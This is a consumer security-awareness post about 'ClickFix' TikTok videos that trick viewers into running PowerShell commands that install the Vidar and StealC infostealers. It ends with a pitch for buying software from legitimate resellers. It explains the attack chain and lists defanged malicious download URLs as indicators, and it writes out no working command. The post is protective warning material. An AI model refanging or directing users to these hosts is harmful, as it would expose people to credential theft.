Social media platforms like TikTok have become powerful tools for connection and entertainment, but they are also increasingly exploited by cybercriminals. A new wave of attacks, dubbed “ClickFix,” is leveraging AI-generated TikTok videos to trick users into installing dangerous information-stealing malware. It’s crucial to understand how these attacks work to protect yourself.
What is a ClickFix Attack?
ClickFix is a tactic where attackers employ fake errors or verification systems, such as CAPTCHA prompts, to trick potential targets into running malicious scripts that download and install malware on their devices. While primarily targeting Windows users through PowerShell commands, ClickFix has also been adapted for attacks against macOS and Linux users. Even state-sponsored threat groups like Russia’s APT28 and ColdRiver, North Korea’s Kimsuky, and Iran’s MuddyWater have used similar tactics in recent espionage campaigns.
In the specific TikTok campaign, cybercriminals are using videos, likely generated using AI, to entice users. These videos ask viewers to run commands disguised as steps to activate Windows and Microsoft Office, or to unlock premium features in legitimate software like CapCut and Spotify. Trend Micro observed that these videos are highly similar, with only minor differences in camera angles and the download URLs, suggesting automation in their creation. The instructional voice also appears AI-generated, further reinforcing the likelihood of AI tools being used.
The Deception: How the Malware Spreads
One such video, claiming to offer instructions on how to “boost your Spotify experience instantly,” garnered almost 500,000 views, over 20,000 likes, and more than 100 comments. In these videos, attackers prompt viewers to run a PowerShell command.
However, this command does not activate software or unlock features. Instead, it downloads and executes a remote script (e.g., from hxxps://allaivo[.]me/spotify) that installs Vidar or StealC information-stealing malware, launching it as a hidden process with elevated permissions. After the initial compromise, the script then downloads a second PowerShell script payload (e.g., from hxxps://amssh[.]co/script[.]ps1) which adds a registry key to ensure the malware launches automatically at startup, maintaining persistence on the infected device.
The Dangerous Payloads: Vidar and StealC Infostealers
Once deployed, these information-stealing malware variants can cause significant damage:
- Vidar is capable of taking desktop screenshots and stealing sensitive data including credentials, credit cards, cookies, cryptocurrency wallets, text files, and Authy 2FA authenticator databases.
- Stealc is designed to harvest a wide range of sensitive information from infected computers, specifically targeting dozens of web browsers and cryptocurrency wallets.
Not the First Time TikTok Has Been Used for Malware
This isn’t an isolated incident. TikTok videos have been previously exploited to push malware. For example, cybercriminals capitalized on a trending ‘Invisible Challenge’ on TikTok to infect thousands with a fake app that installed WASP Stealer (Discord Token Grabber) malware. This particular malware was pushed through videos that received over a million views shortly after being posted and could steal Discord accounts, passwords, credit cards, and cryptocurrency wallets. In recent years, scammers have also flooded TikTok with fake cryptocurrency giveaways, often using themes related to Elon Musk, Tesla, or SpaceX.
Why You Should Purchase Software from Legitimate Sources
The ‘ClickFix’ attacks highlight a critical security lesson: attempting to obtain software through unofficial means, such as “cracks,” “activators,” or free downloads from untrusted sources, is incredibly risky. These methods are frequently used by cybercriminals to distribute malware, as seen with the TikTok campaigns offering “free” activation or premium features.
Purchasing software from legitimate, authorized sources (like reputable technology providers such as Blue Chip Technologies) ensures that you are receiving genuine, verified software free from malicious payloads. Legitimate software typically undergoes security checks, receives regular updates and patches, and comes with proper support. This significantly reduces the risk of unknowingly installing infostealers or other harmful malware onto your devices. The ongoing threat of malware distributed through unofficial channels underscores the importance of obtaining software through secure and trusted channels.
Protecting your digital life starts with smart choices about where and how you acquire your software.
